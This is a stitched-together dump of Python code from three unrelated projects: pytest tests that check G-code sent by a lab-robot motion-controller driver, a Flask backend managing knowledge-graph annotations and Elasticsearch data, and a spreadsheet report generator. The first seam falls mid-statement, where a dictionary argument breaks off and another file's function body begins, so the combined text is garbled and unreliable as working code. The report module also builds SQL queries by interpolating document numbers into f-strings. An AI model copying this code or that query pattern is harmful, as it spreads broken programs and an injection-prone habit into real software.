['M18 [XYZ]+'],
['M400'],
['M18 [ABC]+'],
['M400'],
]
fuzzy_assert(result=command_log, expected=expected)
def test_plunger_commands(smoothie, monkeypatch):
command_log = []
smoothie._setup()
smoothie.home()
smoothie.simulating = False
def write_with_log(command, ack, connection, timeout, tag=None):
command_log.append(command.strip())
return driver_3_0.SMOOTHIE_ACK
def _parse_position_response(arg):
return smoothie.position
monkeypatch.setattr(
serial_communication, 'write_and_return', write_with_log)
monkeypatch.setattr(
driver_3_0, '_parse_position_response', _parse_position_response)
smoothie.home()
expected = [
['M907 A0.8 B0.05 C0.05 X0.3 Y0.3 Z0.8 G4 P0.005 G28.2.+[ABCZ].+'],
['M400'],
['M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4 P0.005'],
['M400'],
['M203.1 Y50'],
['M400'],
['M907 A0.1 B0.05 C0.05 X0.3 Y0.8 Z0.1 G4 P0.005 G91 G0 Y-28 G0 Y10 G90'],
['M400'],
['M203.1 X80'],
['M400'],
['M907 A0.1 B0.05 C0.05 X1.25 Y0.3 Z0.1 G4 P0.005 G28.2 X'],
['M400'],
['M203.1 A125 B40 C40 X600 Y400 Z125'],
['M400'],
['M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4 P0.005'],
['M400'],
['M203.1 Y80'],
['M400'],
['M907 A0.1 B0.05 C0.05 X0.3 Y1.25 Z0.1 G4 P0.005 G28.2 Y'],
['M400'],
['M203.1 Y8'],
['M400'],
['G91 G0 Y-3 G90'],
['M400'],
['G28.2 Y'],
['M400'],
['G91 G0 Y-3 G90'],
['M400'],
['M203.1 A125 B40 C40 X600 Y400 Z125'],
['M400'],
['M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4 P0.005'],
['M400'],
['M114.2'],
['M400'],
]
fuzzy_assert(result=command_log, expected=expected)
command_log = []
smoothie.move({'X': 0, 'Y': 1.123456, 'Z': 2, 'A': 3})
expected = [
['M907 A0.8 B0.05 C0.05 X1.25 Y1.25 Z0.8 G4 P0.005 G0.+'],
['M400'],
]
fuzzy_assert(result=command_log, expected=expected)
command_log = []
smoothie.move({'B': 2})
expected = [
['M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4 P0.005 G0 B2'],
['M400'],
['M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4 P0.005'],
['M400'],
]
fuzzy_assert(result=command_log, expected=expected)
command_log = []
smoothie.move({
'X': 10.987654321,
'Y': 2.12345678,
'Z': 2.5,
'A': 3.5,
'B': 4.25,
'C': 5.55})
expected = [
# Set active axes high
['M907 A0.8 B0.05 C0.05 X1.25 Y1.25 Z0.8 G4 P0.005 G0.+[BC].+'],
['M400'],
# Set plunger current low
['M907 A0.8 B0.05 C0.05 X1.25 Y1.25 Z0.8 G4 P0.005'],
['M400'],
]
fuzzy_assert(result=command_log, expected=expected)
def test_move_with_split(smoothie, monkeypatch):
command_log = []
smoothie._setup()
smoothie.home()
smoothie.simulating = False
smoothie.configure_splits_for(
{
"B": MoveSplit(
split_distance=1,
split_current=1.75,
split_speed=1,
after_time=1800,
fullstep=True),
"C": MoveSplit(
split_distance=1,
split_current=1.75,
split_speed=1,
after_time=1800,
fullstep=True)
}
)
smoothie._steps_per_mm = {"B": 1.0, "C": 1.0}
def write_with_log(command, ack, connection, timeout, tag=None):
command_log.append(command.strip())
return driver_3_0.SMOOTHIE_ACK
def _parse_position_response(arg):
return smoothie.position
monkeypatch.setattr(
serial_communication, 'write_and_return', write_with_log)
monkeypatch.setattr(
driver_3_0, '_parse_position_response', _parse_position_response)
smoothie.move({'X': 0, 'Y': 1.123456, 'Z': 2, 'C': 3})
expected = [
['M55 M92 C0.03125 G4 P0.01 G0 F60 M907 A0.1 B0.05 C1.75 X1.25 Y1.25 '
'Z0.8 G4 P0.005'],
['M400'],
['G0 C18.0'],
['M400'],
['M54 M92 C1.0 G4 P0.01'],
['M400'],
['G0 F24000 M907 A0.1 B0.05 C0.05 X1.25 Y1.25 Z0.8 G4 P0.005 G0.+'],
['M400'],
['M907 A0.1 B0.05 C0.05 X1.25 Y1.25 Z0.8 G4 P0.005'],
['M400'],
]
fuzzy_assert(result=command_log, expected=expected)
command_log = []
smoothie.move({'B': 2})
expected = [
['M53 M92 B0.03125 G4 P0.01 G0 F60 M907 A0.1 B1.75 C0.05 '
'X0.3 Y0.3 Z0.1 G4 P0.005'],
['M400'],
['G0 B18.0'],
['M400'],
['M52 M92 B1.0 G4 P0.01'],
['M400'],
['M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4 P0.005 G0 B2'],
['M400'],
['M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4 P0.005'],
['M400'],
]
fuzzy_assert(result=command_log, expected=expected)
command_log = []
def test_set_active_current(smoothie, monkeypatch):
command_log = []
smoothie._setup()
smoothie.home()
smoothie.simulating = False
def write_with_log(command, ack, connection, timeout, tag=None):
command_log.append(command.strip())
return driver_3_0.SMOOTHIE_ACK
def _parse_position_response(arg):
return smoothie.position
monkeypatch.setattr(serial_communication, 'write_and_return',
write_with_log)
monkeypatch.setattr(
driver_3_0, '_parse_position_response', _parse_position_response)
smoothie.set_active_current(
{'X': 2, 'Y': 2, 'Z': 2, 'A': 2, 'B': 2, 'C': 2})
smoothie.set_dwelling_current(
{'X': 0, 'Y': 0, 'Z': 0, 'A': 0, 'B': 0, 'C': 0})
smoothie.move({'X': 0, 'Y': 0, 'Z': 0, 'A': 0, 'B': 0, 'C': 0})
smoothie.move({'B': 1, 'C': 1})
smoothie.set_active_current({'B': 0.42, 'C': 0.42})
smoothie.home('BC')
expected = [
# move all
['M907 A2 B2 C2 X2 Y2 Z2 G4 P0.005 G0 A0 B0 C0 X0 Y0 Z0'],
['M400'],
['M907 A2 B0 C0 X2 Y2 Z2 G4 P0.005'], # disable BC axes
['M400'],
# move BC
['M907 A0 B2 C2 X0 Y0 Z0 G4 P0.005 G0 B1.3 C1.3 G0 B1 C1'],
['M400'],
['M907 A0 B0 C0 X0 Y0 Z0 G4 P0.005'], # disable BC axes
['M400'],
['M907 A0 B0.42 C0.42 X0 Y0 Z0 G4 P0.005 G28.2 BC'], # home BC
['M400'],
['M907 A0 B0 C0 X0 Y0 Z0 G4 P0.005'], # dwell all axes after home
['M400'],
['M114.2'], # update the position
['M400'],
]
fuzzy_assert(result=command_log, expected=expected)
def test_steps_per_mm(smoothie, monkeypatch):
# Check that steps_per_mm dict gets loaded with defaults on start
assert smoothie.steps_per_mm == {}
smoothie._setup()
expected = {
**DEFAULT_GANTRY_STEPS_PER_MM,
'B': DEFAULT_PIPETTE_CONFIGS['stepsPerMM'],
'C': DEFAULT_PIPETTE_CONFIGS['stepsPerMM'],
}
assert smoothie.steps_per_mm == expected
smoothie.update_steps_per_mm({'Z': 450})
expected['Z'] = 450
assert smoothie.steps_per_mm == expected
def test_pipette_configs(smoothie, monkeypatch):
axis_value = 'home updated 175'
smoothie._send_command = Mock(return_value=axis_value)
res = smoothie.update_pipette_config('Z', {'home': 175})
expected_return = {'Z': {'home': 175}}
assert res == expected_return
def test_set_acceleration(smoothie, monkeypatch):
command_log = []
smoothie._setup()
smoothie.home()
smoothie.simulating = False
def write_with_log(command, ack, connection, timeout, tag=None):
command_log.append(command.strip())
return driver_3_0.SMOOTHIE_ACK
def _parse_position_response(arg):
return smoothie.position
monkeypatch.setattr(serial_communication, 'write_and_return',
write_with_log)
monkeypatch.setattr(
driver_3_0, '_parse_position_response', _parse_position_response)
smoothie.set_acceleration(
{'X': 1, 'Y': 2, 'Z': 3, 'A': 4, 'B': 5, 'C': 6})
smoothie.push_acceleration()
smoothie.pop_acceleration()
smoothie.set_acceleration(
{'X': 10, 'Y': 20, 'Z': 30, 'A': 40, 'B': 50, 'C': 60})
smoothie.pop_acceleration()
expected = [
['M204 S10000 A4 B5 C6 X1 Y2 Z3'],
['M400'],
['M204 S10000 A4 B5 C6 X1 Y2 Z3'],
['M400'],
['M204 S10000 A40 B50 C60 X10 Y20 Z30'],
['M400'],
['M204 S10000 A4 B5 C6 X1 Y2 Z3'],
['M400'],
]
fuzzy_assert(result=command_log, expected=expected)
def test_active_dwelling_current_push_pop(smoothie):
assert smoothie._active_current_settings != \
smoothie._dwelling_current_settings
old_active_currents = deepcopy(smoothie._active_current_settings)
old_dwelling_currents = deepcopy(smoothie._dwelling_current_settings)
smoothie.push_active_current()
    smoothie.set_active_current({'X': 2.0, 'Y': 2.0,
res = es.load_data(index, type, doc, doc['doc_id'])
if not res:
logger.info('Fail to retrieve or load data to {}: project {}, kg_id {}, tag{}, index {}, type {}'
.format(index_version, project_name, kg_id, tag_name, index, type))
return
logger.info('Fail to retrieve or load data to {}: project {}, kg_id {}, tag{}, index {}, type {}'
.format(index_version, project_name, kg_id, tag_name, index, type))
return
except Exception as e:
logger.warning('Fail to remove annotation from {}: project {}, kg_id {}, tag {}'.format(
index_version, project_name, kg_id, tag_name
))
@staticmethod
def write_to_tag_file(project_name, tag_name):
file_path = os.path.join(_get_project_dir_path(project_name), 'entity_annotations/' + tag_name + '.csv')
tag_obj = data[project_name]['entities']
with codecs.open(file_path, 'w') as csvfile:
writer = csv.DictWriter(
csvfile, fieldnames=['tag_name', 'entity_name', 'kg_id', 'human_annotation'],
delimiter=',', quotechar='"', quoting=csv.QUOTE_NONNUMERIC)
writer.writeheader()
for entity_name_, entity_obj_ in tag_obj.iteritems():
for kg_id_, kg_obj_ in entity_obj_.iteritems():
for tag_name_, tag_obj_ in kg_obj_.iteritems():
if tag_name_ == tag_name and 'human_annotation' in tag_obj_:
writer.writerow(
{'tag_name': tag_name_, 'entity_name': entity_name_,
'kg_id': kg_id_, 'human_annotation': tag_obj_['human_annotation']})
@staticmethod
def load_from_tag_file(project_name):
dir_path = os.path.join(_get_project_dir_path(project_name), 'entity_annotations')
for file_name in os.listdir(dir_path):
name, ext = os.path.splitext(file_name)
if ext != '.csv':
continue
file_path = os.path.join(dir_path, file_name)
with codecs.open(file_path, 'r') as csvfile:
reader = csv.DictReader(
csvfile, fieldnames=['tag_name', 'entity_name', 'kg_id', 'human_annotation'],
delimiter=',', quotechar='"', quoting=csv.QUOTE_NONNUMERIC)
next(reader, None) # skip header
for row in reader:
_add_keys_to_dict(data[project_name]['entities'],
[row['entity_name'], row['kg_id'], row['tag_name']])
data[project_name]['entities'][row['entity_name']][row['kg_id']][row['tag_name']][
'human_annotation'] = row['human_annotation']
@api.route('/projects/<project_name>/tags/<tag_name>/annotations/<entity_name>/annotations/<kg_id>')
class TagAnnotationsForEntity(Resource):
@requires_auth
def delete(self, project_name, tag_name, entity_name, kg_id):
if project_name not in data:
return rest.not_found('Project: {} not found'.format(project_name))
if tag_name not in data[project_name]['master_config']['tags']:
return rest.not_found('Tag {} not found'.format(tag_name))
if entity_name not in data[project_name]['entities']:
return rest.not_found('Entity {} not found'.format(entity_name))
if kg_id not in data[project_name]['entities'][entity_name]:
return rest.not_found('kg_id {} not found'.format(kg_id))
if tag_name not in data[project_name]['entities'][entity_name][kg_id]:
return rest.not_found('kg_id {} not found'.format(kg_id))
if 'human_annotation' in data[project_name]['entities'][entity_name][kg_id][tag_name]:
del data[project_name]['entities'][entity_name][kg_id][tag_name]['human_annotation']
# write to file
TagAnnotationsForEntityType.write_to_tag_file(project_name, tag_name)
# remove from ES
TagAnnotationsForEntityType.es_remove_tag_annotation('full', project_name, kg_id, tag_name)
TagAnnotationsForEntityType.es_remove_tag_annotation('sample', project_name, kg_id, tag_name)
# commit to git
# git_helper.commit(files=[project_name + '/entity_annotations/' + tag_name + '.csv'],
# message='delete a tag annotation: project {}, entity {}, tag {}, kg_id {}'
# .format(project_name, entity_name, tag_name, kg_id))
return rest.deleted()
@requires_auth
def get(self, project_name, tag_name, entity_name, kg_id):
if project_name not in data:
return rest.not_found('Project: {} not found'.format(project_name))
if tag_name not in data[project_name]['master_config']['tags']:
return rest.not_found('Tag {} not found'.format(tag_name))
if entity_name not in data[project_name]['entities']:
return rest.not_found('Entity {} not found'.format(entity_name))
if kg_id not in data[project_name]['entities'][entity_name]:
return rest.not_found('kg_id {} not found'.format(kg_id))
if tag_name not in data[project_name]['entities'][entity_name][kg_id]:
return rest.not_found('kg_id {} not found'.format(kg_id))
# if 'human_annotation' not in data[project_name]['entities'][entity_name][kg_id][tag_name]:
# return rest.not_found('No human_annotation')
ret = data[project_name]['entities'][entity_name][kg_id][tag_name]
# return knowledge graph
parser = reqparse.RequestParser()
parser.add_argument('kg', required=False, type=str, help='knowledge graph')
args = parser.parse_args()
return_kg = True if args['kg'] is not None and \
args['kg'].lower() == 'true' else False
if return_kg:
ret['knowledge_graph'] = self.get_kg(project_name, kg_id, tag_name)
return ret
@staticmethod
def get_kg(project_name, kg_id, tag_name):
index_version = 'full'
try:
es = ES(config['es'][index_version + '_url'])
index = data[project_name]['master_config']['index'][index_version]
type = data[project_name]['master_config']['root_name']
hits = es.retrieve_doc(index, type, kg_id)
if hits:
doc = hits['hits']['hits'][0]['_source']
if 'knowledge_graph' not in doc:
return None
return doc['knowledge_graph']
return None
except Exception as e:
logger.warning('Fail to update annotation to: project {}, kg_id {}, tag {}'.format(
project_name, kg_id, tag_name
))
@api.route('/projects/<project_name>/data')
class Data(Resource):
@requires_auth
def post(self, project_name):
if project_name not in data:
return rest.not_found('project {} not found'.format(project_name))
parse = reqparse.RequestParser()
parse.add_argument('file_data', type=werkzeug.FileStorage, location='files')
parse.add_argument('file_name')
parse.add_argument('file_type')
parse.add_argument('sync')
parse.add_argument('log')
args = parse.parse_args()
if args['file_name'] is None:
return rest.bad_request('Invalid file_name')
file_name = args['file_name'].strip()
if len(file_name) == 0:
return rest.bad_request('Invalid file_name')
if args['file_data'] is None:
return rest.bad_request('Invalid file_data')
if args['file_type'] is None:
return rest.bad_request('Invalid file_type')
args['sync'] = False if args['sync'] is None or args['sync'].lower() != 'true' else True
args['log'] = True if args['log'] is None or args['log'].lower() != 'false' else False
# make root dir and save temp file
src_file_path = os.path.join(_get_project_dir_path(project_name), 'data', '{}.tmp'.format(file_name))
args['file_data'].save(src_file_path)
dest_dir_path = os.path.join(_get_project_dir_path(project_name), 'data', file_name)
if not os.path.exists(dest_dir_path):
os.mkdir(dest_dir_path)
if not args['sync']:
t = threading.Thread(target=Data._update_catalog_worker,
args=(project_name, file_name, args['file_type'], src_file_path, dest_dir_path,
args['log'],),
name='data_upload')
t.start()
data[project_name]['threads'].append(t)
return rest.accepted()
else:
Data._update_catalog_worker(project_name, file_name, args['file_type'],
src_file_path, dest_dir_path, args['log'])
return rest.created()
@staticmethod
def _update_catalog_worker(project_name, file_name, file_type, src_file_path, dest_dir_path, log_on=True):
def _write_log(content):
with data[project_name]['locks']['catalog_log']:
log_file.write('<#{}> {}: {}\n'.format(thread.get_ident(), file_name, content))
log_path = os.path.join(_get_project_dir_path(project_name),
'working_dir/catalog_error.log') if log_on else os.devnull
log_file = codecs.open(log_path, 'a')
_write_log('start updating catalog')
try:
# generate catalog
if file_type == 'json_lines':
suffix = os.path.splitext(file_name)[-1]
f = gzip.open(src_file_path, 'r') \
if suffix in ('.gz', '.gzip') else codecs.open(src_file_path, 'r')
for line in f:
if len(line.strip()) == 0:
continue
obj = json.loads(line)
# raw_content
if 'raw_content' not in obj:
obj['raw_content'] = ''
try:
obj['raw_content'] = unicode(obj['raw_content']).encode('utf-8')
except:
pass
# doc_id
obj['doc_id'] = unicode(obj.get('doc_id', obj.get('_id', ''))).encode('utf-8')
if not Data.is_valid_doc_id(obj['doc_id']):
if len(obj['doc_id']) > 0: # has doc_id but invalid
old_doc_id = obj['doc_id']
obj['doc_id'] = base64.b64encode(old_doc_id)
_write_log('base64 encoded doc_id from {} to {}'
.format(old_doc_id, obj['doc_id']))
if not Data.is_valid_doc_id(obj['doc_id']):
# generate doc_id
# if there's raw_content, generate id based on raw_content
# if not, use the whole object
if len(obj['raw_content']) != 0:
obj['doc_id'] = Data.generate_doc_id(obj['raw_content'])
else:
obj['doc_id'] = Data.generate_doc_id(json.dumps(obj, sort_keys=True))
_write_log('Generated doc_id for object: {}'.format(obj['doc_id']))
# url
if 'url' not in obj:
obj['url'] = '{}/{}'.format(Data.generate_tld(file_name), obj['doc_id'])
_write_log('Generated URL for object: {}'.format(obj['url']))
# timestamp_crawl
if 'timestamp_crawl' not in obj:
# obj['timestamp_crawl'] = time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime())
obj['timestamp_crawl'] = datetime.datetime.now().isoformat()
else:
try:
parsed_date = dateparser.parse(obj['timestamp_crawl'])
obj['timestamp_crawl'] = parsed_date.isoformat()
except:
_write_log('Can not parse timestamp_crawl: {}'.format(obj['doc_id']))
continue
# type
# this type will conflict with the attribute in logstash
if 'type' in obj:
obj['original_type'] = obj['type']
del obj['type']
# split raw_content and json
output_path_prefix = os.path.join(dest_dir_path, obj['doc_id'])
output_raw_content_path = output_path_prefix + '.html'
output_json_path = output_path_prefix + '.json'
with codecs.open(output_raw_content_path, 'w') as output:
output.write(obj['raw_content'])
with codecs.open(output_json_path, 'w') as output:
del obj['raw_content']
output.write(json.dumps(obj, indent=2))
# update data db
tld = obj.get('tld', Data.extract_tld(obj['url']))
with data[project_name]['locks']['data']:
data[project_name]['data'][tld] = data[project_name]['data'].get(tld, dict())
# if doc_id is already there, still overwrite it
exists_before = True if obj['doc_id'] in data[project_name]['data'][tld] else False
data[project_name]['data'][tld][obj['doc_id']] = {
'raw_content_path': output_raw_content_path,
'json_path': output_json_path,
'url': obj['url'],
'add_to_queue': False
}
# update status
if not exists_before:
with data[project_name]['locks']['status']:
data[project_name]['status']['total_docs'][tld] = \
data[project_name]['status']['total_docs'].get(tld, 0) + 1
# update data db & status file
set_catalog_dirty(project_name)
set_status_dirty(project_name)
f.close()
elif file_type == 'html':
pass
# notify action add data if needed
# Actions._add_data(project_name)
except Exception as e:
logger.exception('exception in _update_catalog_worker')
_write_log('Invalid file format')
finally:
# stop logging
_write_log('done')
log_file.close()
# remove temp file
os.remove(src_file_path)
@requires_auth
def get(self, project_name):
if project_name not in data:
return rest.not_found('project {} not found'.format(project_name))
parser = reqparse.RequestParser()
parser.add_argument('type', type=str)
args = parser.parse_args()
ret = dict()
log_path = os.path.join(_get_project_dir_path(project_name), 'working_dir/catalog_error.log')
# if args['type'] == 'has_error':
# ret['has_error'] = os.path.getsize(log_path) > 0
if args['type'] == 'error_log':
ret['error_log'] = list()
if os.path.exists(log_path):
with codecs.open(log_path, 'r') as f:
ret['error_log'] = tail_file(f, 200)
else:
with data[project_name]['locks']['status']:
for tld, num in data[project_name]['status']['total_docs'].iteritems():
ret[tld] = num
return ret
@requires_auth
def delete(self, project_name):
if project_name not in data:
return rest.not_found('project {} not found'.format(project_name))
input = request.get_json(force=True)
tld_list = input.get('tlds', list())
delete_from = input.get('from')
if delete_from is None:
return rest.bad_request('invalid attribute: from')
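# 'file': drop the cached raw_content/json files and catalog entries for the TLDs;
# 'kg': delete the documents from the Elasticsearch knowledge graph and reset counters.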
if delete_from == 'file':
t = threading.Thread(target=Data._delete_file_worker,
args=(project_name, tld_list,),
name='data_file_delete')
t.start()
data[project_name]['threads'].append(t)
elif delete_from == 'kg':
t = threading.Thread(target=Data._delete_es_worker,
args=(project_name, tld_list,),
name='data_kg_delete')
t.start()
data[project_name]['threads'].append(t)
return rest.accepted()
@staticmethod
def _delete_file_worker(project_name, tld_list):
for tld in tld_list:
# update status
with data[project_name]['locks']['status']:
if tld in data[project_name]['status']['desired_docs']:
del data[project_name]['status']['desired_docs'][tld]
if tld in data[project_name]['status']['added_docs']:
del data[project_name]['status']['added_docs'][tld]
if tld in data[project_name]['status']['total_docs']:
del data[project_name]['status']['total_docs'][tld]
set_status_dirty(project_name)
# update data
with data[project_name]['locks']['data']:
if tld in data[project_name]['data']:
# remove data file
for k, v in data[project_name]['data'][tld].iteritems():
try:
os.remove(v['raw_content_path'])
except:
pass
try:
os.remove(v['json_path'])
except:
pass
# remove from catalog
del data[project_name]['data'][tld]
set_catalog_dirty(project_name)
@staticmethod
def _delete_es_worker(project_name, tld_list):
query = '''
{{
"query": {{
"match": {{
"tld.raw": "{tld}"
}}
}}
}}
'''
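# The doubled braces above are literal JSON braces escaped for str.format();
# query.format(tld=tld) below fills in the "tld.raw" match term per domain.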
es = ES(config['es']['sample_url'])
for tld in tld_list:
# delete from kg
try:
es.es.delete_by_query(index=project_name,
doc_type=data[project_name]['master_config']['root_name'],
body=query.format(tld=tld))
except:
logger.exception('error in _delete_es_worker')
# update status
with data[project_name]['locks']['status']:
if tld in data[project_name]['status']['added_docs']:
data[project_name]['status']['added_docs'][tld] = 0
data[project_name]['status']['desired_docs'][tld] = 0
set_status_dirty(project_name)
# update data
with data[project_name]['locks']['data']:
if tld in data[project_name]['data']:
for doc_id in data[project_name]['data'][tld].iterkeys():
data[project_name]['data'][tld][doc_id]['add_to_queue'] = False
set_catalog_dirty(project_name)
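# Helper overview: the static methods below are used by _update_catalog_worker
# above to normalise uploaded records, e.g.
#   doc_id = Data.generate_doc_id(raw_content)               # upper-case sha256 hex
#   url    = '{}/{}'.format(Data.generate_tld(file_name), doc_id)
#   tld    = Data.extract_tld(url)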
@staticmethod
def generate_tld(file_name):
return 'www.dig_{}.org'.format(re.sub(re_url, '_', file_name.lower()).strip())
@staticmethod
def generate_doc_id(content):
return hashlib.sha256(content).hexdigest().upper()
@staticmethod
def is_valid_doc_id(doc_id):
return re_doc_id.match(doc_id) is not None and doc_id not in os_reserved_file_names
@staticmethod
def extract_tld(url):
parts = tldextract.extract(url)
return parts.domain + '.' + parts.suffix
@api.route('/projects/<project_name>/actions/project_config')
class ActionProjectConfig(Resource):
@requires_auth
def post(self, project_name): # frontend | |
<filename>sources/backend/mods/generate_report.py
# coding: utf-8
import os
import sys
import time
import json
import atexit
import datetime
import tempfile
import zipfile
import shutil
import base64
import zipimport
import traceback
from relatorio.templates.opendocument import Template
from xml.sax.saxutils import escape
class Invoice(dict):
pass
# @property
# def total(self):
# return sum(l['item']['amount'] for l in self['lines'])
class Shipment(Invoice):
doc_template = 'shipment_short.ods'
class Movement(Invoice):
doc_template = 'movement_short.ods'
class Arrival(Invoice):
doc_template = 'arrival_short.ods'
class Rest(Invoice):
doc_template = 'rest_short.ods'
class Balance(Invoice):
doc_template = 'balance.ods'
class Prod_movements(Invoice):
doc_template = 'products_movements.ods'
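# Each Invoice subclass only pins the .ods template for its document type;
# the data dicts themselves are built by the _generate_* helpers in REPORT below
# and are presumably rendered with relatorio's opendocument Template (imported above).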
class REPORT:
def __init__(self, parent):
self.parent = parent
# _of = tempfile.NamedTemporaryFile(prefix='esc.', suffix=".print", delete=False)
# Keep a reference to the TemporaryDirectory object itself: binding only .name
# would let the object be garbage-collected and the directory removed early.
self._temp_dir_obj = tempfile.TemporaryDirectory(prefix='report_generator_')
self.temp_dir = self._temp_dir_obj.name
# print(self.temp_dir)
# atexit.register(self._at_exit)
def at_exit(self):
if self.temp_dir and os.path.exists(self.temp_dir):
shutil.rmtree(self.temp_dir)
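# Rendering sketch (assumption: the actual rendering happens in code not shown here).
# With relatorio, a data dict built by the helpers below would be fed to the
# .ods template roughly like:
#   tpl = Template(source='', filepath=Arrival.doc_template)
#   odf_bytes = tpl.generate(o=data).render().getvalue()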
def generate_test(self, *args, **kwargs):
self.parent._print("*"*10, " generate_test ", "*"*10)
self.parent._print(args)
self.parent._print(kwargs)
self.parent._print("*"*10, " generate_test ", "*"*10)
# doc_type = 'arrival'
# kwargs['doc_type'] = doc_type
self.generate(*args, **kwargs)
answer = {"params": args,
"kwargs": kwargs, "timing": {"sql": 0, "process": 0},
}
return answer
def _generate_short_arrival(self, doc_number):
self.parent._print(doc_number)
data = {}
sql = f"""select
jah.n_number as doc_number,
jah.n_base as doc_base,
jah.n_executor as doc_employ,
rps.n_name as doc_suppl,
jah.n_pos_numbers as doc_positions,
jah.n_summ as doc_total,
jah.n_dt_invoice as doc_date,
rpc.n_name as rec_name,
rpr.c_name as pos_prod_name,
jab.n_product->'n_unit' as pos_unit,
jab.n_product->'n_amount' as pos_kol,
jab.n_product->'n_total_summ' as pos_total,
(jab.n_product->'n_total_summ')::int / (jab.n_product->'n_amount')::int as pos_price
-- ,jrb.n_product
from journals_arrivals_headers jah
join ref_partners rpc on rpc.n_id = jah.n_recipient
join ref_partners rps on rps.n_id = jah.n_supplier
join journals_arrivals_bodies jab ON jab.n_doc_id = jah.n_id and jab.n_deleted = false
join ref_products rpr on (rpr.c_id=(jab.n_product->'n_product')::bigint)
where jah.n_id = '{doc_number}'::bigint
order by jab.n_id"""
res = self.parent._request(sql)
if res:
data = {
'number': res[0][0],
'date': res[0][6],
'retailer': {
'name': res[0][3]
},
'customer': {
'name': res[0][7],
'storage': res[0][7],
},
'lines': [],
'total': self._gen_price(res[0][5]),
'total_text': '--'
}
for i, row in enumerate(res, 1):
r = {'item': {
'pos': i,
'name': row[8],
'unit': row[9],
'price': self._gen_price(row[12]),
'quantity': row[10],
'amount': self._gen_price(row[11])
}
}
data['lines'].append(r)
return data
def _generate_short_rest(self, doc_number):
self.parent._print(doc_number)
data = {}
sql = f"""select
jrh.n_number as doc_number,
jrh.n_base as doc_base,
jrh.n_executor as doc_employ,
jrh.n_pos_numbers as doc_positions,
jrh.n_summ as doc_total,
jrh.n_dt_invoice as doc_date,
rp.n_name as rec_name,
rpr.c_name as pos_prod_name,
jrb.n_product->'n_unit' as pos_unit,
jrb.n_product->'n_amount' as pos_kol,
jrb.n_product->'n_total_summ' as pos_total,
(jrb.n_product->'n_total_summ')::int / (jrb.n_product->'n_amount')::int as pos_price
-- ,jrb.n_product
from journals_rests_headers jrh
join ref_partners rp on rp.n_id = jrh.n_recipient
join journals_rests_bodies jrb ON jrb.n_doc_id = jrh.n_id and jrb.n_deleted = false
join ref_products rpr on (rpr.c_id=(jrb.n_product->'n_product')::bigint)
where jrh.n_id = '{doc_number}'::bigint
order by jrb.n_id
"""
res = self.parent._request(sql)
if res:
data = {
'number': res[0][0],
'date': res[0][5],
'customer': {
'storage': res[0][6],
},
'lines': [],
'total': self._gen_price(res[0][4]),
'total_text': '--'
}
for i, row in enumerate(res, 1):
r = {'item': {
'pos': i,
'name': row[7],
'unit': row[8],
'price': self._gen_price(row[11]),
'quantity': row[9],
'amount': self._gen_price(row[10])}
}
data['lines'].append(r)
return data
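# _gen_price converts an integer amount in minor currency units into a
# decimal-comma string, e.g. 12345 -> '123,45'.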
def _gen_price(self, price):
price = str(price)
return price[:-2] + ',' + price[-2:]
def _generate_balance(self):
sql = f"""select rp.c_name as name,
rp.c_nnt as t_code,
max(jpb.n_price) as price,
sum(jpb.n_quantity) as kol,
jpb.n_product_id as pr_id
from journals_products_balance jpb
join ref_products rp ON rp.c_id = jpb.n_product_id and (jpb.n_quantity != 0 and jpb.n_quantity is not null)
group by 1, 2, 5
order by 1 """
res = self.parent._request(sql)
# no legacy fallback query for the balance report
if res:
data = {
'lines': [],
'total_amount': '',
'total_summ': '',
'total_pos': len(res)
}
for i, row in enumerate(res, 1):
p = row[2]*row[3]
r = {'item': {
'pos': i,
'name': row[0],
'code': row[1],
'price': f"""{str(row[2])[:-2]},{str(row[2])[-2:]}""",
'amount': row[3],
'summ': f"""{str(p)[:-2]},{str(p)[-2:]}"""
}
}
data['lines'].append(r)
ta = sum([ i['item']['amount'] for i in data['lines']])
ts = sum([ i[2]*i[3] for i in res])
data['total_amount'] = ta
data['total_summ'] = f"""{str(ts)[:-2]},{str(ts)[-2:]}"""
return data
def _generate_short_movement(self, doc_number):
self.parent._print(doc_number)
data = {}
sql_old = f"""select
jmh.n_number as doc_number,
jmh.n_base as doc_base,
jmh.n_executor as doc_employ,
rps.n_name as doc_suppl,
jmh.n_pos_numbers as doc_positions,
jmh.n_summ as doc_sell_total,
(jmh.n_summ::numeric / (1 + (jmb.n_product->'n_charge')::numeric))::int as doc_prih_total,
jmh.n_dt_invoice as doc_date,
rpc.n_name as doc_rec_name,
j1.name as pos_prod_name,
jmb.n_product->'n_unit' as pos_unit,
jmb.n_product->'n_amount' as pos_kol,
case
when (jmb.n_product->'n_amount')::int > 0
then (jmb.n_product->'n_total_summ')::int /(jmb.n_product->'n_amount')::int
else 0
end as pos_sale_price,
jmb.n_product->'n_total_summ' as pos_sale_total,
jpb.n_consignment as seria,
'' as goden,
case
when (jmb.n_product->'n_amount')::int > 0
then ((jmb.n_product->'n_total_summ')::numeric / (1 + (jmb.n_product->'n_charge')::numeric))::int / (jmb.n_product->'n_amount')::int
else 0
end as pos_prih_price,
((jmb.n_product->'n_total_summ')::numeric / (1 + (jmb.n_product->'n_charge')::numeric))::int as pos_prih_total,
rpu.n_name as u_name
from journals_movements_headers jmh
join ref_partners rpc on rpc.n_id = jmh.n_recipient
join ref_partners rps on rps.n_id = jmh.n_supplier
join journals_movements_bodies jmb ON jmb.n_doc_id = jmh.n_id and jmb.n_deleted = false
join journals_products_balance jpb on jpb.n_id = (jmb.n_product->'n_balance_id')::bigint
join (select pb.n_product_id, rp.c_name as name, pb.n_id as id, pb.n_quantity as stock
from journals_products_balance pb
join ref_products rp on (rp.c_id=pb.n_product_id)) as j1
on (j1.id = (jmb.n_product->'n_balance_id')::bigint)
join ref_partners rpu on rpu.n_id = rpc.n_parent_id
where jmh.n_id = '{doc_number}'::bigint
order by pos_prod_name --jmb.n_id"""
sql = f"""select
jmh.n_number as doc_number,
jmh.n_base as doc_base,
jmh.n_executor as doc_employ,
rps.n_name as doc_suppl,
jmh.n_pos_numbers as doc_positions,
jmh.n_summ as doc_sell_total,
(jmh.n_summ::numeric / (1 + (jmb.n_product->'n_charge')::numeric))::int as doc_prih_total,
